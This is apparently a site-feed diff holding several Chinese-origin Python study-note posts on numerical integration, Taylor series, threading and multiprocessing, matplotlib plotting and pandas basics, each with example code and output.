scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
Parameters:
func: callable
A Python function or method of at least two variables: y must be the first argument and x the second.

a, b: float
The integration limits in x: a < b

gfun: callable or float
The lower boundary curve in y, either a function taking a single float argument (x) and returning a float, or a float for a constant boundary.

hfun: callable or float
The upper boundary curve in y (same requirements as gfun).

args: sequence, optional
Extra arguments passed to func.

epsabs: float, optional
Absolute tolerance passed directly to the inner 1-D quadrature. Default 1.49e-8. dblquad tries to obtain an accuracy of abs(i-result) <= max(epsabs, epsrel*abs(i)), where i = the inner integral of func(y, x) from gfun(x) to hfun(x), and result is the numerical approximation. See epsrel below.

epsrel: float, optional
Relative tolerance of the inner 1-D integrals. Default 1.49e-8. If epsabs <= 0, epsrel must be greater than both 5e-29 and 50 * (machine epsilon).

Returns:
y: float
The resulting integral.

abserr: float
An estimate of the error.
"""
dblquad(integrand, x_a, x_b, lambda x: y_a, lambda x: y_b)
(0.7853981633974476, 1.375309851021853e-08)

Example 3.8 Approximating a definite integral

Approximate $\int_{0}^{3} \cos^2(e^x)\,dx$ from the definition (a trapezoidal sum)

from numpy import *

a, b = 0, 3


def f(x):
    return cos(exp(x)) ** 2


def trape(n):
    h = (b - a) / n  # width of each of the n sub-intervals
    x = a
    sum = 0
    for i in range(1, n):  # note: this stops at x = b - h, so the last small trapezoid is left out and the sum slightly undershoots
        x2 = a + i * h
        sum += (f(x) + f(x2)) * h / 2  # one small trapezoid: (top + bottom) * height / 2
        x = x2
    return sum
trape(10)
0.944822326405313
trape(100)
1.2843391540917448
trape(1000)
1.2960750567338157
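
As a cross-check, NumPy's built-in trapezoidal rule gives a matching value (a sketch):

import numpy as np

x = np.linspace(0, 3, 1001)  # 1000 sub-intervals
print(np.trapz(np.cos(np.exp(x)) ** 2, x))  # about 1.296, in line with trape(1000) and quad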

Indefinite integrals

$ \int \ln x \, dx $

    from sympy import *
    from sympy.abc import x

    expr = log(x)
    integrate(expr,x)

    $\displaystyle x \log{\left(x \right)} - x$

3.8 Exercises

$\int _{1}^{2} \left( x^2 + \frac {1}{x^4} \right) dx$

$ =(\frac {1}{3}x^3 - \frac {1}{3}x^{-3}) \big| _{1}^{2}$

$ = \frac {21}{8}$

    import numpy as np
    from scipy.integrate import quad

    func = lambda x: x ** 2 + x ** (-4)
    quad(func, 1, 2)
    (2.625, 2.914335439641036e-14)

$ \int _{-1}^{0}\frac {3x^4+3x^2+1}{x^2+1}dx$

$ =\int _{-1}^{0}\left(3x^2+\frac {1}{1+x^2}\right)dx$

$ = (x^3 + \arctan x)\big| _{-1}^{0} $

$ = 1 + \frac{\pi}{4} $

    import numpy as np
    from scipy.integrate import quad

    func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
    quad(func, -1, 0)
    (1.7853981633974483, 1.9821901491273144e-14)

Use the definition of the definite integral to evaluate a limit:

$ \lim _{n \to \infty}\frac {1^{p}+2^{p}+\dots+n^{p}}{n^{p+1}}$

$ = \lim _{n \to \infty}\frac {\sum_{i=1}^{n}i^p}{n^{p+1}} $

$ = \lim _{n \to \infty}\frac{1}{n} \sum_{i=1}^{n}\left(\frac{i}{n}\right)^p $

$ = \int _{0}^{1}x^p\,dx $

$ = \frac {1}{p+1} $
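
A quick numeric check of the limit for p = 2, where the value should approach 1/3 (a sketch):

n, p = 10_000, 2
print(sum(i ** p for i in range(1, n + 1)) / n ** (p + 1))  # about 0.33338, approaching 1/3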

4 Taylor's formula and Lagrange multipliers

A mnemonic for the standard expansions: exponential and logarithmic series run through consecutive powers while trigonometric ones skip every other power; trigonometric and logarithmic series alternate signs from term to term, and trigonometric and exponential series carry factorials in the denominators

Example 4.7 Use the $n$-th Taylor polynomial of $e^x$ to approximate $e$

$ e\approx 1+1+\frac{1}{2!}+\frac{1}{3!}+\dots+\frac{1}{n!}$

import numpy as np
import pandas as pd


def f(n):
    sum1 = 1
    if n == 0:
        sum1 = 1
    else:
        m = n + 1
        for i in range(1, m):
            sum2 = 1.0  # accumulate i! here
            k = i + 1
            for j in range(1, k):
                sum2 = sum2 * j
            sum1 = sum1 + 1.0 / sum2  # add 1/i!
    return sum1


num = 10
pd.DataFrame(np.array([[i, f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])
    n e
    0 1.0 2.000000
    1 2.0 2.500000
    2 3.0 2.666667
    3 4.0 2.708333
    4 5.0 2.716667
    5 6.0 2.718056
    6 7.0 2.718254
    7 8.0 2.718279
    8 9.0 2.718282
    9 10.0 2.718282
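
For comparison, the same approximation in one line with math.factorial (a sketch):

import math

print(sum(1 / math.factorial(i) for i in range(11)))  # 2.7182818..., matching the n = 10 row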

Example 4.13 The $n$-th Taylor polynomial of $\sin x$

$\sin x = x - \frac {x^3}{3!} + \frac {x^5}{5!} - \frac {x^7}{7!} + \dots + (-1)^{m-1}\frac {x^{2m-1}}{(2m-1)!}+R_{2m}(x)$

import numpy as np
import pandas as pd


def fsin(x):
    m = 20  # number of terms
    sum = 0.0
    for i in range(1, m + 1):
        n = 2 * i - 1  # 2m-1
        temp1, temp2, temp3 = 1, 1, 1
        for j in range(1, i):  # (-1)^(m-1)
            temp1 = -temp1
        for j in range(1, n + 1):
            temp2 = temp2 * x  # x^(2m-1)
            temp3 = temp3 * j  # (2m-1)!
        sum += temp1 * temp2 / temp3
    return sum


pd.DataFrame({'np.sin(x)': np.array([np.sin(x) for x in range(-20, 1)]),
              'fsin(x)': np.array([fsin(x) for x in range(-20, 1)]),
              'error': np.array([fsin(x) - np.sin(x) for x in range(-20, 1)])},
             index=np.array([x for x in range(-20, 1)]))
    np.sin(x) fsin(x) error
    -20 -0.912945 5364.411846 5.365325e+03
    -19 -0.149877 666.994385 6.671443e+02
    -18 0.750987 74.739042 7.398806e+01
    -17 0.961397 8.185042 7.223645e+00
    -16 0.287903 0.899283 6.113793e-01
    -15 -0.650288 -0.606249 4.403901e-02
    -14 -0.990607 -0.987967 2.640574e-03
    -13 -0.420167 -0.420039 1.282664e-04
    -12 0.536573 0.536578 4.880595e-06
    -11 0.999990 0.999990 1.394300e-07
    -10 0.544021 0.544021 2.831679e-09
    -9 -0.412118 -0.412118 3.790196e-11
    -8 -0.989358 -0.989358 2.858824e-13
    -7 -0.656987 -0.656987 3.441691e-15
    -6 0.279415 0.279415 3.497203e-15
    -5 0.958924 0.958924 -2.775558e-15
    -4 0.756802 0.756802 -6.661338e-16
    -3 -0.141120 -0.141120 1.110223e-16
    -2 -0.909297 -0.909297 0.000000e+00
    -1 -0.841471 -0.841471 0.000000e+00
    0 0.000000 0.000000 0.000000e+00
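
The blow-up for large |x| happens because the early terms grow enormous before the factorials win. Reducing the argument into [-pi, pi] first keeps the 20-term series accurate; a sketch reusing fsin from above:

import numpy as np


def fsin_reduced(x):
    x = (x + np.pi) % (2 * np.pi) - np.pi  # shift the argument into [-pi, pi)
    return fsin(x)


print(fsin_reduced(-20), np.sin(-20))  # both about -0.912945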

4.9 Exercises

$\lim _{x \to 0}\frac {\sin x-x\cos x}{\sin^3x}$

$=\lim _{x \to 0}\frac {x-\frac{1}{6}x^3-x(1-\frac{1}{2}x^2)}{x^3}$

$=\lim _{x \to 0}\frac {-\frac{1}{6}x^3+\frac{1}{2}x^3}{x^3}$

$=\frac{1}{3}$

    import sympy
    from sympy import sin, cos, limit

    x = sympy.Symbol('x')
    f = (sin(x) - x * cos(x)) / (sin(x) ** 3)
    limit(f, x, 0)

    $\displaystyle \frac{1}{3}$

    ]]>
@@ -10185,7 +10185,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88multithreading%EF%BC%89/ - Main text

2 Adding a thread (add thread)

import threading

Inspecting the state of the threads

threading.active_count()  # how many threads are currently active
6
threading.enumerate()  # details of the active threads
[<_MainThread(MainThread, started 5844)>, <Thread(IOPub, started daemon 7116)>, <Heartbeat(Heartbeat, started daemon 9816)>, <ControlThread(Control, started daemon 4020)>, <HistorySavingThread(IPythonHistorySavingThread, started 4124)>, <ParentPollerWindows(Thread-4, started daemon 10940)>]
threading.current_thread()  # the thread currently running
<_MainThread(MainThread, started 5844)>

Add a thread

def thread_job():
    print("This is an added Thread, number is %s" % threading.current_thread())

def main():
    added_thread = threading.Thread(target=thread_job)  # add a thread whose target is thread_job
    added_thread.start()  # run the thread

if __name__ == "__main__":
    main()
This is an added Thread, number is <Thread(Thread-8, started 7464)>

3 The join feature

import threading
import time

def thread_job():
    print("T1start\n")
    for i in range(10):
        time.sleep(0.1)  # pause 0.1 s per step
    print("T1 finish\n")

def T2_job():
    print('T2start\n')
    print('T2 finish')


def main():
    added_thread = threading.Thread(target=thread_job, name='T1')
    thread2 = threading.Thread(target=T2_job, name='T2')

    added_thread.start()
    thread2.start()

    added_thread.join()  # join into the main thread
    thread2.join()

    print('all done\n')

if __name__ == "__main__":
    main()
T1start
T2start
T2 finish
T1 finish
all done

Once the threads are joined, the main thread prints 'all done\n' only after every joined thread has finished
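
For contrast, a sketch without join(): the main thread races ahead, so 'all done' can appear before the worker finishes:

import threading
import time


def T1_job():
    time.sleep(0.5)
    print('T1 finish')


t1 = threading.Thread(target=T1_job)
t1.start()  # started but never joined
print('all done')  # printed immediately, before 'T1 finish'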

4 The Queue feature

A Queue handles the fact that a thread's target function cannot return a value

import threading
import time
from queue import Queue


def job(l, q):
    for i in range(len(l)):
        l[i] **= 2
    q.put(l)  # put the computed list into q


def multithreading():
    q = Queue()
    threads = []
    data = [[1, 2, 3], [3, 4, 5], [4, 4, 4], [5, 5, 5]]
    for i in range(4):  # create 4 threads
        t = threading.Thread(target=job, args=(data[i], q))  # args passes arguments to the target function
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()
    results = []
    for _ in range(4):
        results.append(q.get())  # take the data out of the queue and append it to results
    print(results)


if __name__ == '__main__':
    multithreading()
[[1, 4, 9], [9, 16, 25], [16, 16, 16], [25, 25, 25]]

5 Not necessarily faster: the GIL

• For fairly simple workloads, multithreading is not necessarily faster than a single thread, because switching threads costs time (under the GIL only one thread can occupy the CPU at any moment)
• Why is multithreading sometimes faster anyway? Because some workloads overlap computation with reading and writing data. For pure computation the fix is multiprocessing
• Below, four times the sum of 0-999999 is computed with the plain method and with multithreading
  Reference: Python GIL 全局解释器锁详解(深度剖析)
import threading
from queue import Queue
import copy
import time


def job(l, q):
    res = sum(l)
    q.put(res)


def multithreading(l):  # the multithreaded method
    q = Queue()
    threads = []
    for i in range(4):
        t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)
        t.start()
        threads.append(t)
    [t.join() for t in threads]
    total = 0
    for _ in range(4):
        total += q.get()
    print(total)


def normal(l):  # the plain method
    total = sum(l)  # sum the sequence
    print(total)


if __name__ == '__main__':
    l = list(range(1000_000))

    s_t = time.time()
    normal(l * 4)
    print('normal:', time.time() - s_t)

    s_t = time.time()
    multithreading(l)
    print('multithreading:', time.time() - s_t)
1999998000000
normal: 0.1690812110900879
1999998000000
multithreading: 0.24041318893432617

6 Locks (lock)

A lock is generally needed only when threads share state; it stops different runs of the program from interleaving differently

Without a lock

import threading


def job1():
    global A  # A is a global variable
    for i in range(10):
        A += 1
        print('job1', A)


def job2():
    global A  # A is a global variable
    for i in range(10):
        A += 10
        print('job2', A)


if __name__ == '__main__':
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
job1job2 11
job2 21
job2 31
job2 41
job2 51
job2 61
job2 71
job2 81
job2 91
job2 101
1
job1 102
job1 103
job1 104
job1 105
job1 106
job1 107
job1 108
job1 109
job1 110

With a lock

job2 runs only after job1 has finished

import threading


def job1():
    global A, lock  # use the shared lock
    lock.acquire()  # acquire the lock
    for i in range(10):
        A += 1
        print('job1', A)
    lock.release()  # release the lock


def job2():
    global A, lock  # A is a global variable
    lock.acquire()  # acquire the lock
    for i in range(10):
        A += 10
        print('job2', A)
    lock.release()  # release the lock


if __name__ == '__main__':
    lock = threading.Lock()
    A = 0
    t1 = threading.Thread(target=job1)
    t2 = threading.Thread(target=job2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
job1 1
job1 2
job1 3
job1 4
job1 5
job1 6
job1 7
job1 8
job1 9
job1 10
job2 20
job2 30
job2 40
job2 50
job2 60
job2 70
job2 80
job2 90
job2 100
job2 110
    ]]>
@@ -10212,7 +10212,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88multiprocessing%EF%BC%89/ - Main text

2 Creating a process

Jupyter can only track the main process, not child processes.

import multiprocessing as mp
import threading as td

def job(a, d):
    print('aaaa')


if __name__ == '__main__':
    p1 = mp.Process(target=job, args=(1, 2))
    p1.start()
    p1.join()

3 Getting process output with a queue

import multiprocessing as mp

def job(q):
    res = 0
    for i in range(1000):
        res += i + i ** 2 + i ** 3
    q.put(res)


if __name__ == '__main__':
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    print(res1 + res2)
499667166000

4 Efficiency comparison: multiprocessing vs multithreading

Using the plain method, multicore computation, and multithreaded computation:

import multiprocessing as mp
import threading as td
import time


def job(q):
    res = 0
    for i in range(10_000_000):
        res += i + i ** 2 + i ** 3
    q.put(res)


def multicore():  # multicore computation (x2)
    q = mp.Queue()
    p1 = mp.Process(target=job, args=(q,))
    p2 = mp.Process(target=job, args=(q,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


def multithread():  # multithreaded computation (x2)
    q = mp.Queue()
    t1 = td.Thread(target=job, args=(q,))
    t2 = td.Thread(target=job, args=(q,))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    res1 = q.get()
    res2 = q.get()
    return res1 + res2


def normal():  # the plain method
    res = 0
    for _ in range(2):
        for i in range(10_000_000):
            res += i + i ** 2 + i ** 3
    return res


if __name__ == '__main__':
    st = time.time()

    print(normal())
    print('normal time: ', time.time() - st)

    st = time.time()
    print(multicore())
    print('multicore time: ', time.time() - st)

    st = time.time()
    print(multithread())
    print('multithread time: ', time.time() - st)

4999999666666716666660000000
normal time: 12.397605657577515
4999999666666716666660000000
multicore time: 6.265762090682983
4999999666666716666660000000
multithread time: 18.33289623260498

Elapsed time: multithreading > plain > multicore: the threads pay GIL and switching overhead on this CPU-bound job, while the two processes genuinely run in parallel

5 Process pools (Pool)

Put the work into a Pool and Python decides how to distribute it
Inside a Pool, the job function may also return a value

import multiprocessing as mp


def job(x):
    return x * x


def multicore():
    pool = mp.Pool(processes=3)  # use at most 3 cores; by default all cores are used
    res = pool.map(job, range(10))  # squares of 0-9 across cores; map() takes many inputs and distributes them automatically
    print(res)

    res = pool.apply_async(job, (2,))  # takes a single input; the return value lands in res
    print(res.get())  # fetch the result from res

    multi_res = [pool.apply_async(job, (i, )) for i in range(10)]  # a comprehension that mimics map()
    print([res.get() for res in multi_res])


if __name__ == '__main__':
    multicore()

[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
4
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

6 Shared memory

In multithreading, global variables can be used to share state, but that does not work across processes
Shared memory is the only way to let CPUs on different cores exchange data

Data types supported by shared memory

import multiprocessing as mp

value = mp.Value('i', 1)  # pass the type code first, then the value
array = mp.Array('i', [1, 3, 4])  # the array must be one-dimensional, otherwise it raises an error
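
Reading them back (a usage sketch): a Value exposes .value, and an Array supports indexing and slicing; 'i' is the C int type code, 'd' would be a double:

print(value.value)  # 1
print(array[:])  # [1, 3, 4]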

7 Locks (lock)

Without a lock:

import multiprocessing as mp
import time


def job(v, num, name):
    for _ in range(10):
        time.sleep(0.1)
        v.value += num
        print(name + ': ' + str(v.value))


def multicore():
    v = mp.Value('i', 0)  # define a piece of shared memory
    p1 = mp.Process(target=job, args=(v, 1, 'p1'))
    p2 = mp.Process(target=job, args=(v, 3, 'p2'))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


if __name__ == '__main__':
    multicore()

    p1: 1
    p2: 4
    p1: 5
    p2: 8
    p1: 9
    p2: 12
    p1: 13
    p2: 16
    p1: 17
    p2: 20
    p1: 21
    p2: 24
    p1: 25
    p2: 28
    p1: 29
    p2: 32
    p1: 33
    p2: 36
    p1: 37
    p2: 40

With a lock:

import multiprocessing as mp
import time


def job(v, num, name, l):
    l.acquire()  # acquire the lock
    for _ in range(10):
        time.sleep(0.1)
        v.value += num
        print(name + ': ' + str(v.value))
    l.release()  # release the lock


def multicore():
    l = mp.Lock()
    v = mp.Value('i', 0)  # define a piece of shared memory
    p1 = mp.Process(target=job, args=(v, 1, 'p1', l))
    p2 = mp.Process(target=job, args=(v, 3, 'p2', l))
    p1.start()
    p2.start()
    p1.join()
    p2.join()


if __name__ == '__main__':
    multicore()

    p1: 1
    p1: 2
    p1: 3
    p1: 4
    p1: 5
    p1: 6
    p1: 7
    p1: 8
    p1: 9
    p1: 10
    p2: 13
    p2: 16
    p2: 19
    p2: 22
    p2: 25
    p2: 28
    p2: 31
    p2: 34
    p2: 37
    p2: 40
    ]]>
    @@ -10239,7 +10239,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88matplotlib%EF%BC%89/ - 正文

2.1 Basic usage

import matplotlib.pyplot as plt
import numpy as np

Plot a two-dimensional function:

x = np.linspace(-1, 1, 50)
y = 2 * x + 1
plt.plot(x, y)  # feed in the data
plt.show()  # display the figure

    png
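
plt.show() only displays the figure; to also keep it on disk, plt.savefig can be called before plt.show() (the file name here is made up):

plt.plot(x, y)
plt.savefig('line.png', dpi=150)  # write the current figure to a file
plt.show()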

2.2 figure: managing figure windows

import matplotlib.pyplot as plt
import numpy as np

Display several figures:

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure()
    plt.plot(x, y1)

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.show()

    png

    png

2.3 Configuring the axes (1)

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

plt.xlim((-1, 2))  # set the visible range
plt.ylim((-2, 3))
plt.xlabel('I am X')  # set the axis labels
plt.ylabel('I am Y')

new_ticks = np.linspace(-1, 2, 5)  # set the tick positions
print(new_ticks)
plt.xticks(new_ticks)

plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$'])  # set the tick labels

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

2.4 Configuring the axes (2)

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

plt.xlim((-1, 2))  # set the visible range
plt.ylim((-2, 3))
plt.xlabel('I am X')  # set the axis labels
plt.ylabel('I am Y')

new_ticks = np.linspace(-1, 2, 5)  # set the tick positions
print(new_ticks)
plt.xticks(new_ticks)

plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$'])  # set the tick labels

ax = plt.gca()
ax.spines['right'].set_color('none')  # hide the right spine
ax.spines['top'].set_color('none')  # hide the top spine
ax.xaxis.set_ticks_position('bottom')  # attach the ticks to the remaining spines
ax.yaxis.set_ticks_position('left')
ax.spines['bottom'].set_position(('data', 0))  # move the spines to the data origin
ax.spines['left'].set_position(('data', 0))

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

2.5 Legend

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

plt.xlim((-1, 2))  # set the visible range
plt.ylim((-2, 3))
plt.xlabel('I am X')  # set the axis labels
plt.ylabel('I am Y')

new_ticks = np.linspace(-1, 2, 5)  # set the tick positions
print(new_ticks)
plt.xticks(new_ticks)

plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$'])  # set the tick labels

l1, = plt.plot(x, y2, label='up')  # label the lines for the legend
l2, = plt.plot(x, y1, color='red', linewidth=1.0, linestyle='--', label='down')
plt.legend(handles=[l1, l2], labels=['aaa', 'bbb'], loc='best')  # draw the legend

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

2.6 Annotation

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 2 * x + 1

    plt.figure(num=1, figsize=(8, 5),)
    plt.plot(x, y,)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

x0 = 1
y0 = 2 * x0 + 1
plt.scatter(x0, y0, s=50, color='b')  # mark the point (1, 3)
plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5)  # draw a black dashed drop line

plt.annotate(r'$2x+1=%s$' % y0, xy=(x0, y0), xycoords='data', xytext=(+30, -30),
             textcoords='offset points', fontsize=16,
             arrowprops=dict(arrowstyle='->', connectionstyle='arc3, rad=.2'))  # add the annotation

plt.text(-3.7, 3, r'$This\ is\ some\ text.\ \mu\ \sigma_i\ \alpha_t$',
         fontdict={'size': 16, 'color': 'r'})

    plt.show()

    png

2.7 Tick visibility

    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 0.1 * x

    plt.figure()
    plt.plot(x, y, lw=10)
    plt.ylim(-2, 2)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

for label in ax.get_xticklabels() + ax.get_yticklabels():
    label.set_fontsize(12)
    label.set_bbox(dict(facecolor='yellow', edgecolor='None', alpha=0.7))

    plt.show()

    png

3.1 Scatter plots

    import matplotlib.pyplot as plt
    import numpy as np

    n = 1024
    X = np.random.normal(0, 1, n)
    Y = np.random.normal(0, 1, n)
T = np.arctan2(Y, X)  # used only to give each point a nice color
plt.scatter(X, Y, s=75, c=T, alpha=0.5)
plt.xlim((-1.5, 1.5))
plt.ylim((-1.5, 1.5))
plt.xticks(())  # hide all x ticks
plt.yticks(())

    plt.show()

    png

3.2 Bar charts

    import matplotlib.pyplot as plt
    import numpy as np

    n = 12
    X = np.arange(n)
    Y1 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))
    Y2 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))

plt.bar(X, +Y1, facecolor="#9999ff", edgecolor="white")  # bars pointing up
plt.bar(X, -Y2, facecolor="#ff9999", edgecolor="white")  # bars pointing down

for x, y in zip(X, Y1):  # zip hands the pairs from X and Y1 to x, y
    # ha: horizontal alignment
    plt.text(x, y + 0.05, '%.2f' % y, ha='center', va="bottom")
for x, y in zip(X, Y2):  # zip hands the pairs from X and Y2 to x, y
    # ha: horizontal alignment
    plt.text(x, -y - 0.2, '%.2f' % -y, ha='center', va="bottom")

    plt.xlim(-0.5, n)
    plt.xticks(())
    plt.ylim(-1.25, 1.25)
    plt.yticks(())

    plt.show()

    png

3.3 Contour plots

    import matplotlib.pyplot as plt
    import numpy as np


def f(x, y):
    return (1 - x / 2 + x ** 5 + y ** 3) * np.exp(-x ** 2 - y ** 2)


n = 256
x = np.linspace(-3, 3, n)
y = np.linspace(-3, 3, n)
X, Y = np.meshgrid(x, y)  # combine x and y into grid coordinates

    plt.contourf(X, Y, f(X, Y), 8, alpha=0.75, cmap=plt.cm.hot)
    C = plt.contour(X, Y, f(X, Y), 8, colors='black')

    plt.clabel(C, inline=True, fontsize=10)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

3.4 Images

    import matplotlib.pyplot as plt
    import numpy as np

a = np.array(np.random.random(9)).reshape(3, 3)  # the image data
    a.sort()
    plt.imshow(a, interpolation="none", cmap='bone', origin='lower')
    plt.colorbar(shrink=0.9)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

3.5 3-D data

    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

fig = plt.figure()  # create a new figure window
ax = Axes3D(fig, auto_add_to_figure=False)  # add a set of 3-D axes
fig.add_axes(ax)

# input data
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

4.1 Subplot: several plots in one figure

    import matplotlib.pyplot as plt

    plt.figure()

plt.subplot(2, 1, 1)  # split the figure into 2 rows x 1 column and draw in the first slot
    plt.plot([0, 1], [0, 1])

    plt.subplot(2, 3, 4)
    plt.plot([0, 1], [0, 2])

    plt.subplot(235)
    plt.plot([0, 1], [0, 3])

    plt.subplot(236)
    plt.plot([0, 1], [0, 4])

    plt.show()

    png

4.2 Subplot: uneven grids

    import matplotlib.pyplot as plt
    import matplotlib.gridspec as gridspec
    # method 1: subplot2grid
    plt.figure()

    ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3, rowspan=1)
    ax1.plot([1, 2], [1, 2])
    ax1.set_title("ax1_title")

    ax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=1)

    ax3 = plt.subplot2grid((3, 3), (1, 2), colspan=1, rowspan=2)

    ax4 = plt.subplot2grid((3, 3), (2, 0), colspan=1, rowspan=1)

    ax5 = plt.subplot2grid((3, 3), (2, 1), colspan=1, rowspan=1)

    plt.tight_layout()
    plt.show()


    png

    # method 2: gridspec
    plt.figure()
    gs = gridspec.GridSpec(3, 3)
    ax1 = plt.subplot(gs[0, :])
    ax2 = plt.subplot(gs[1, :2])
    ax3 = plt.subplot(gs[1:, 2])
    ax4 = plt.subplot(gs[-1, 0])
    ax5 = plt.subplot(gs[-1, -2])

    plt.tight_layout()
    plt.show()


    png

    # method 3: easy to define structure
    f, ((ax11, ax12), (ax21, ax22)) = plt.subplots(2, 2, sharex=True, sharey=True)
    ax11.scatter([1, 2], [1, 2])

    plt.tight_layout()
    plt.show()

    png

4.3 Plot inside a plot (inset axes)

    import matplotlib.pyplot as plt

    fig = plt.figure()
    x = [1, 2, 3, 4, 5, 6, 7]
    y = [1, 3, 4, 2, 5, 8, 6]

    left, bottom, width, height = 0.1, 0.1, 0.8, 0.8
    ax1 = fig.add_axes([left, bottom, width, height])
    ax1.plot(x, y, 'r')
    ax1.set_xlabel('x')
    ax1.set_ylabel('y')
    ax1.set_title('title')

    left, bottom, width, height = 0.2, 0.6, 0.25, 0.25
    ax2 = fig.add_axes([left, bottom, width, height])
    ax2.plot(y, x, 'b')
    ax2.set_xlabel('x')
    ax2.set_ylabel('y')
    ax2.set_title('title inside 1')

    plt.axes([0.6, 0.2, 0.25, 0.25])
    plt.plot(y[::-1], x, 'g')
    plt.xlabel('x')
    plt.ylabel('y')
    plt.title('title inside 2')


    plt.show()

    png

4.4 Secondary y-axis

    import matplotlib.pyplot as plt
    import numpy as np
    x = np.arange(0, 10, 0.1)
    y1 = 0.05 * x ** 2
    y2 = -1 * y1

    fig, ax1 = plt.subplots()
ax2 = ax1.twinx()  # share the x-axis and mirror a second y-axis on the right
    ax1.plot(x, y1, 'g-')
    ax2.plot(x, y2, 'b--')
    ax1.set_xlabel('X data')
    ax1.set_ylabel('Y1', color='g')
    ax2.set_ylabel('Y2', color='b')

    plt.show()

    png

5.1 Animation

    import numpy as np
    from matplotlib import pyplot as plt
    from matplotlib import animation
    fig, ax = plt.subplots()

    x = np.arange(0, 2 * np.pi, 0.01)
    line, = ax.plot(x, np.sin(x))

def animate(i):
    line.set_ydata(np.sin(x + i / 10))
    return line,

def init():
    line.set_ydata(np.sin(x))
    return line,

ani = animation.FuncAnimation(fig=fig, func=animate, frames=100, init_func=init, interval=20, blit=True)

    plt.show()

    png
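
To keep the animation rather than just display it, the FuncAnimation object can be saved; a minimal sketch (the file name is an example, and the 'pillow' writer needs the Pillow package installed):

ani.save('sine.gif', writer='pillow', fps=50)  # render the 100 frames into a gif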

    ]]>
    @@ -10266,7 +10266,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88pandas%EF%BC%89/ - 正文

    + 正文

3.1 pandas basics

If numpy is like a list, pandas is like a dictionary.

    import pandas as pd
    import numpy as np

Create a pandas Series:

pd.Series([1, 3, 6, np.nan, 44, 1])  # np.nan plays the role of None
0     1.0
1     3.0
2     6.0
3     NaN
4    44.0
5     1.0
dtype: float64

Create a sequence of dates:

dates = pd.date_range('20160101', periods=6)
dates
